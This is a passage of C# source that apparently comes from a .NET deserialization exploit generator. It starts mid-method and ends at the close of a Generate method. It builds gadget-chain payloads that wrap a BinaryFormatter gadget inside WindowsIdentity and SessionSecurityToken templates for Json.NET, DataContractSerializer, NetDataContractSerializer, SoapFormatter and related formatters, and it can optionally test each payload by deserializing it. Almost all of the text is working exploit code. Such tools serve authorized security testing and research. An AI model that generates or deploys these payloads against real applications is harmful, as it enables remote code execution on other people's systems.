string payload = $@"<SOAP-ENV:Envelope xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns:SOAP-ENC=""http://schemas.xmlsoap.org/soap/encoding/"" xmlns:SOAP-ENV=""http://schemas.xmlsoap.org/soap/envelope/"" xmlns:clr=""http://schemas.microsoft.com/soap/encoding/clr/1.0"" SOAP-ENV:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/"">
<SOAP-ENV:Body>
<a1:SessionSecurityToken id=""ref-1"" xmlns:a1=""http://schemas.microsoft.com/clr/nsassem/System.IdentityModel.Tokens/System.IdentityModel%2C%20Version%3D4.0.0.0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3Db77a5c561934e089"">
<SessionToken href=""#ref-3""/>
</a1:SessionSecurityToken>
<SOAP-ENC:Array id=""ref-3"" xsi:type=""SOAP-ENC:base64"">{GetB64SessionToken(b64encoded)}</SOAP-ENC:Array>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
";
if (inputArgs.Minify)
{
payload = XMLMinifier.Minify(payload, null, null, FormatterType.SoapFormatter);
}
if (inputArgs.Test)
{
try
{
SerializersHelper.SoapFormatter_deserialize(payload);
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
return(payload);
}
else
{
throw new Exception("Formatter not supported");
}
}
public override object Generate(string formatter, InputArgs inputArgs)
{
Generator generator = new TextFormattingRunPropertiesGenerator();
byte[] binaryFormatterPayload = (byte[])generator.GenerateWithNoTest("BinaryFormatter", inputArgs);
string b64encoded = Convert.ToBase64String(binaryFormatterPayload);
if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase) ||
formatter.Equals("losformatter", StringComparison.OrdinalIgnoreCase) ||
formatter.Equals("objectstateformatter", StringComparison.OrdinalIgnoreCase))
{
var obj = new IdentityMarshal(b64encoded);
return(Serialize(obj, formatter, inputArgs));
}
else if (formatter.ToLower().Equals("json.net"))
{
string payload = @"{
'$type': 'System.Security.Principal.WindowsIdentity, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
'System.Security.ClaimsIdentity.actor': '" + b64encoded + @"'
}";
if (inputArgs.Minify)
{
if (inputArgs.UseSimpleType)
{
payload = JSONMinifier.Minify(payload, new string[] { "mscorlib" }, null);
}
else
{
payload = JSONMinifier.Minify(payload, null, null);
}
}
if (inputArgs.Test)
{
try
{
SerializersHelper.JsonNet_deserialize(payload);
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
return(payload);
}
else if (formatter.ToLower().Equals("datacontractserializer"))
{
string payload = $@"<root type=""System.Security.Principal.WindowsIdentity, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"">
<WindowsIdentity xmlns:i=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:x=""http://www.w3.org/2001/XMLSchema"" xmlns=""http://schemas.datacontract.org/2004/07/System.Security.Principal"">
<System.Security.ClaimsIdentity.actor i:type=""x:string"" xmlns="""">{b64encoded}</System.Security.ClaimsIdentity.actor>
</WindowsIdentity>
</root>
";
if (inputArgs.Minify)
{
if (inputArgs.UseSimpleType)
{
payload = XMLMinifier.Minify(payload, new string[] { "mscorlib" }, null);
}
else
{
payload = XMLMinifier.Minify(payload, null, null);
}
}
if (inputArgs.Test)
{
try
{
SerializersHelper.DataContractSerializer_deserialize(payload, null, "root", "type");
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
return(payload);
}
else if (formatter.ToLower().Equals("netdatacontractserializer"))
{
string payload = $@"<root>
<w xmlns:i=""http://www.w3.org/2001/XMLSchema-instance"" z:Type=""System.Security.Principal.WindowsIdentity"" z:Assembly=""mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"" xmlns:z=""http://schemas.microsoft.com/2003/10/Serialization/"" xmlns="""">
<System.Security.ClaimsIdentity.actor z:Type=""System.String"" z:Assembly=""0"" >{b64encoded}</System.Security.ClaimsIdentity.actor>
</w>
</root>
";
if (inputArgs.Minify)
{
if (inputArgs.UseSimpleType)
{
payload = XMLMinifier.Minify(payload, new string[] { "mscorlib" }, null);
}
else
{
payload = XMLMinifier.Minify(payload, null, null);
}
}
if (inputArgs.Test)
{
try
{
SerializersHelper.NetDataContractSerializer_deserialize(payload);
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
return(payload);
}
else if (formatter.ToLower().Equals("soapformatter"))
{
string payload = $@"<SOAP-ENV:Envelope xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns:SOAP-ENC=""http://schemas.xmlsoap.org/soap/encoding/"" xmlns:SOAP-ENV=""http://schemas.xmlsoap.org/soap/envelope/"" xmlns:clr=""http://schemas.microsoft.com/soap/encoding/clr/1.0"" SOAP-ENV:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/"">
<SOAP-ENV:Body>
<a1:WindowsIdentity id=""ref-1"" xmlns:a1=""http://schemas.microsoft.com/clr/nsassem/System.Security.Principal/mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"">
<System.Security.ClaimsIdentity.actor xsi:type=""xsd:string"" xmlns="""">{b64encoded}</System.Security.ClaimsIdentity.actor>
</a1:WindowsIdentity>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
";
if (inputArgs.Minify)
{
if (inputArgs.UseSimpleType)
{
payload = XMLMinifier.Minify(payload, new string[] { "mscorlib" }, null, FormatterType.SoapFormatter);
}
else
{
payload = XMLMinifier.Minify(payload, null, null, FormatterType.SoapFormatter);
}
}
if (inputArgs.Test)
{
try
{
SerializersHelper.SoapFormatter_deserialize(payload);
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
return(payload);
}
else
{
throw new Exception("Formatter not supported");
}
}